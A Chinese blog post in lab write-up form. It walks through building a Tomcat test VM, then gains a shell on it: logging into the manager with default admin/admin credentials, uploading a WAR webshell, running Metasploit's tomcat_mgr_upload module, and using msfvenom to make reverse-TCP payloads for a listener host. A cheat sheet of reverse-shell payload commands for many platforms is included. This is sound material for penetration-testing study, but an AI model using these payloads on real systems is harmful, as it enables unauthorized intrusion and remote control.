TOMCAT弱口令后台getshell(复现)-<环境搭建->实践操作>

最新推荐文章于 2024-04-15 19:09:45 发布
最新推荐文章于 2024-04-15 19:09:45 发布
阅读量267 收藏 1
点赞数
文章标签: linux java centos tomcat hadoop
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37602797/article/details/117811941
版权

操作流程(环境搭建-实践操作)

在linux虚拟机上安装jdk

新创建linux虚拟机

通过mobaxterm连接虚拟机


v2-1587e7fd3cf96009f8129bc34dea5cfb_b.jpg

导入tomcat安装包与jdk安装包

apache-tomcat-7.0.92.tar

jdk-8u201-linux-x64.tar.gz


v2-00aca0442fdfd7cb9be4889721d40248_b.jpg

查询环境中是否存在java

yum list installed |grep java


v2-0846ad52389d8e52b4932b3aad2fbdd5_b.jpg

创建jdk的路径 /usr/java/

mkdir /usr/java/


v2-6620a0ba154aef151e529b66735edb31_b.jpg


v2-3f21b04db8c336303df286b1a24f70f0_b.jpg

将jdk包解压

tar -zxvf jdk-8u201-linux-x64.tar.gz


v2-abbd9c34b70e41a46b9c6153fe5e2827_b.jpg


v2-7f41013d55db1e0e12d008a7761b44d5_b.jpg

将jdk 1.8.0_201移动到创建的?usr/java/下

mv jdk1.8.0_201/ /usr/java


v2-2d399a7d8af6f0ec18a7adb668670753_b.jpg

建立短链接

ln -s /usr/java/jdk1.8.0_201/ /usr/jdk


v2-b7892cbb5be621b452dec62350da8cb4_b.jpg

编辑配置文件,配置环境变量

vim /etc/profile

添加

export JAVA_HOME=/usr/java/jdk1.8.0_201

export JRE_HOME=${JAVA_HOME}/jre

export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib

export PATH=${JAVA_HOME}/bin:$PATH


v2-193deea6e9f347fa2c08e035ec80b38c_b.jpg

重新加载配置文件/etc/profile

source /etc/profile

也可以使用sudo shutdown -r now重启,但是客户环境的服务器一般是不允许重启的


v2-ccc5b152de0a449cf3e691924ebca27c_b.jpg

查看java版本


v2-8c083df09d1c134cc2eff33907492889_b.jpg

运行命令 javac


v2-9bee5db303e981f4d8b5cdc8bf85d48b_b.jpg

在linux虚拟机上安装tomcat

创建一个tomcat目录

mkdir /usr/tomcat


v2-9d4aa0c0b51cd088d2122950032c0ab7_b.jpg

解压tomcat安装包


v2-d53c36ed393e4057ea383e4122aff998_b.jpg


v2-527c32a19d2bc69256fd42edc8b35381_b.jpg

解压成功

将解压内容移动至 /usr/tomcat

mv apache-tomcat-7.0.92/ /usr/tomcat


v2-6a1816897866e09f705c937bee056c0f_b.jpg

生成链接以便版本升级

ln -s apache-tomcat-7.0.92 server


v2-88a0053587056cc162e613f7f5872622_b.jpg

启动tomcat

在usr/tomcat/server/bin 执行 ./startup.sh


v2-248623b25798deddebbfe59226275ab3_b.jpg


v2-e603f5aeb96052d93203cec565f4e024_b.jpg

关闭防火墙(考虑到安全因素,不可取)


v2-f13b3142b09250d9bd8923edfddc9812_b.jpg

或者编辑防火墙配置文件

vim /etc/sysconfig/iptables

添加需要的端口


v2-c9b677c4c6a17bdd1b737b47b1e33a62_b.jpg

添加的端口需要在

-A INPUT -j REJECT --reject-with icmp-host-prohibited

之上才会生效

重启防火墙服务


v2-aeb284566b348d94584f61f3484e2871_b.jpg

查看防火墙端口状态


v2-2b446a2da3651b5092abe70db236cbd8_b.jpg


访问页面


v2-35a287c27a64237be152eff6596f3bf1_b.jpg

演练开始:

cnblogs.com/bmjoker/p/9

环境搭建好了

http://192.168.0.106:8080


v2-471f7d9f5830806966f1b574042ac6fc_b.jpg


一、上传war包(马儿连接)

1、尝试弱口令默认密码登录 admin/admin


v2-f3c2c98ad80ab9a2f289928fe661f377_b.jpg


2、成功登录manager管理后台


v2-1a464a9ccb94f5f97de3dc0315c6ae11_b.jpg


3、上传war包

上传成功解析成功


v2-7d5f5ec043cbce838985e8a3922d1d10_b.jpg


4、访问war网站内容(内容解析)

192.168.0.106:8080/war/


v2-c69189d7d274ea03e0add926d7cb4885_b.jpg


5、可以执行命令(菜刀连接)


v2-513110ba2d69fe900a0fb792329ad4be_b.jpg


获取到系统的权限


v2-1fb0501fbca361be4a6960ad18727eee_b.jpg



二、MSF反弹getshell

exploit/multi/http/tomcat_mgr_upload


v2-81062a5b0f4f1f24a021dfafdcc3da57_b.jpg


执行ls


v2-56988320bddd2b7a532074ee7fcb2e40_b.jpg


还能查看 etc/passwd


v2-c710109d8f17c1faea431156ca299256_b.jpg


三、msfvenom来作一个后门反弹webshell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.144 LPORT=1111 -f elf > shell.elf



v2-e61110d9aead6114e069b6a2b87b5d6a_b.jpg


其他类型的制作的msf反弹webshell

Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

执行


v2-40ee2b5a78ee743af837c2c889c59e97_b.jpg


反弹回来了


v2-0f77c67c96acbeeea8648ad16f5c032b_b.jpg



总结:

1、就是靶站搭建的时候会刚刚下载的tomcat的默认的没有manger和其他的admin的管理界面的,需要自己器调整conf/tomcat-user.xml才能进行后续的实验。


v2-cfe4e3aa90a8f776b267ce0b625b112a_b.jpg


2、就是需要手动的安装JDK8以上。

3、开始在靶机上面开启服务一直不能msf连接上,需要重启,调节Linux的net work设置,获取同一网段,才好后面的反弹shell的操作。

4、注意msf的webshell制作过程,那个lhost和lport的IP上远程监听的IP。

jianshu.com/u/bf0e38a8d(简书主页)

zhuanlan.zhihu.com/c_17(知乎主页)

thelostworld-公众号
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Tomcat口令及利用(反弹shell)
weixin_45695535的博客
04-04 5586
整体过程欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编
tomcat 口令tomcat8】
向安全进发的博客
04-20 746
Tomcat支持后台部署War文件,默认情况下管理页面仅允许本地访问。 攻击条件:如果网站运维/开发人员手动修改配置文件中的信息允许远程IP进行访问(需求),且恶意攻击者拿到管理界面账户密码情况下,则可上传木马文件,控制系统。==
基于Kali搭建SSH口令靶机并用Nmap实排查
晓梦林的博客
05-03 2484
基于Kali搭建SSH口令靶机并用Nmap实排查
Tomcat后台管理漏洞(口令+上传webshell)_tomcat文件上传漏洞
最新发布
04-15 913
web.xml 是这个应用的配置文件,而 classes 目录下则包含编译好的 servlet 类和 jsp,或者 servlet 所依赖的其他类(如 JavaBean)。1.3将抓到的包发送到爆破模块,快捷键ctrl+i,正常来说是用常见的口令字典去爆破,或者更强大的字典进行爆破,为了节省时间,这里就随便输入了几个账号密码。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然,如果是一个未知的后台登录,且可能存在口令,则使用Burp Suite进行抓包暴力破解,下面简单进行演示。
搭建Vulhub(下载、搭建、测试tomcat口令漏洞)
Pluto.的博客
12-10 1328
Vulhub 1. 概述 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞变得更加简单,让安全研究者更加专注于漏洞原理本身。 2. 搭建Vulhub 2.1 准备工作 安装Ubuntu虚拟机; 修改root密码 sudo passwd root 安装软件 安装ssh和vim apt-get update apt-get install ssh apt-get install vim 开启SSH服务:
vulhub之tomcat口令+部署war包GetShell
lionwerson的博客
04-04 578
1.拉取靶场镜像,打开靶场 2.登陆抓包进行爆破,设置一个位置,然后选择类型为custom iterator,然后在下面payload选项中选择三个位置,然后增加编码的方式,最后一定要取消勾选,在选项最下面的url编码特殊字符,否则就算爆出了口令也无法显示成功。 如果勾选了url编码特殊字符就会让生成的base64编码的结尾的等号被url编码,即使看到的payload正确,但是请求不正确,所以显示不成功。 密码是tomcat,用户名也是。 3.进入后台上传文件,然后getshel.
Maven使用tomcat8-maven-plugin插件的详细教程
01-09
<groupId>org.apache.tomcat.maven</groupId> <artifactId>tomcat7-maven-plugin</artifactId> <version>2.2</version> </plugin> 并没有找到tomcat8-maven-plugin的plugin,在Maven的中央仓库中根本就没有这个...
Tomcat口令扫描的工具.zip
03-31
Tomcat口令扫描工具,可自己写字典进行爆破。
tomcat-cluster-redis-session-manager:Tomcat集群Redis会话管理器Java客户端
05-11
Tomcat集群Redis会话管理器 Redis会话管理器是可插入的。 它将会话存储到Redis中,以便在Tomcat服务器群集之间轻松分配HTTP请求。 在这里,会话被实为非粘性的(意味着,每个请求都可以转到集群中的任何服务器,...
编写docker-compose.yml搭建mysql+tomcat环境
08-05
docker-compose 快速搭建javaweb开发环境,包含mysql和tomcat镜像,适合java web开发者
其他人可以访问自己的本机上的tomcat需要安装jdk吗_TOMCAT口令后台getshell()-<环境搭建->实践操作>...
weixin_39594312的博客
12-05 58
操作流程(环境搭建-实践操作)在linux虚拟机上安装jdk新创建linux虚拟机通过mobaxterm连接虚拟机导入tomcat安装包与jdk安装包apache-tomcat-7.0.92.tarjdk-8u201-linux-x64.tar.gz查询环境中是否存在javayum list installed |grep java创建jdk的路径 /usr/java/mkdir /usr/jav...
Web口令通用检测方法探究
systemino的博客
04-17 4987
注意:本脚本只是探讨通用web口令破解的可行性,所有测试请自行搭建靶机环境或者在拿到目标系统相关授权后再进行测试。文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 工具介绍 通用的web口令破解脚本,旨在批量检测那些没有验证码的管理后台。 随着攻防演练和一些漏洞挖掘任务的增多,有时候需要大批量快速的检测一些网站后台安全...
tomcat8口令&&后台getshell
u014794539的博客
07-16 1432
好哥哥的云服务器搭的靶场 已经知道 Tomcat manager 登录界面存在口令漏洞,登录成功后有上传点,压缩包 xxx.war的.war不会被解析,直接访问 xxx/里面的一句话路径,可直接拿到shell 这里是口令爆破 抓包上bp,看了一眼是 id:passwd 的形式 还有base64的编码 选择用Custom iterator拼接密码进行爆破 还要取消特殊字符的encode 最后得到密码进入后台的manager/html 将带有一句话的shell.jsp小马压缩成zip,并且将压缩后的
Tomcat 管理后台 Getshell
Beret-81的博客
03-15 4110
Tomcat 口令 Getshell1、环境搭建2、暴力破解使用burpsuite 进行暴力破解3、上传木马 War包可以放在Tomcat下的webapps或word目录,当Tomcat服务器启动时,War包即会随之解压源代码来进行自动部署。 1、环境搭建 1、安装java环境 2、安装Tomcat (这里使用Tomcat 7.0.67) 下载链接:https://archive.apache...
linux tomcat 脱离前台,16.Tomcat口令 && 后台getshell漏洞
weixin_39795479的博客
04-28 128
Tomcat7+ 口令 && 后台getshell漏洞Tomcat版本:8.0环境说明Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。其中,欲访问后台,需要对应用户有相应权限。Tomcat7+权限分为:manager(后台管理)manager-gui 拥有html页面权限manager-status 拥有查看status的权限manager-s...
Vulhub - Tomcat8 + 口令 && 后台getshell 漏洞
多崎巡礼的博客
11-08 7345
VulHubTomcat8+ 口令 &amp;amp;amp;&amp;amp;amp; 后台getshell 漏洞环境实验 1.启动docker镜像 docker基于Ubuntu 已搭建完成。 拉取项目git clone https://github.com/vulhub/vulhub.git 进入镜像:cd vulhub/tomcat/tomcat8/ 启动环境:docker-compose up -d 2.登录tomca...
Tomcat口令 && 后台getshell
黑白的博客
11-22 1700
声明 好好学习,天天向上 漏洞描述 用户权限在conf/tomcat-users.xml文件中配置: <?xml version="1.0" encoding="UTF-8"?> <tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http
Tomcat后台口令上传war包漏洞
蚁景网安学院
10-09 828
近期在项目中碰到的ApacheTomcat中间件愈来愈多,于是乎。想着做一个整理。将ApacheTomcat中间件的几大较为重要的高危漏洞做一个总结整理。用作来巩固更新自己的知识库。...
<build> <plugins> <plugin> <groupId>org.apache.tomcat.maven</groupId> <artifactId>tomcat7-maven-plugin</artifactId> <version>2.1</version> <configuration> <port>8080</port> <uriEncoding>UTF-8</uriEncoding> <path>/helloMaven</path> </configuration> </plugin> </plugins> </build>这段代码中的<groupId>org.apache.tomcat.maven</groupId> <artifactId>tomcat7-maven-plugin</artifactId> <version>2.1</version>报红该怎么解决
06-03
这段代码中的 <groupId>org.apache.tomcat.maven</groupId> <artifactId>tomcat7-maven-plugin</artifactId> <version>2.1</version> 报红可能是因为你的 IDE 没有正确解析 Maven 依赖。你可以尝试以下几种解决方法...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值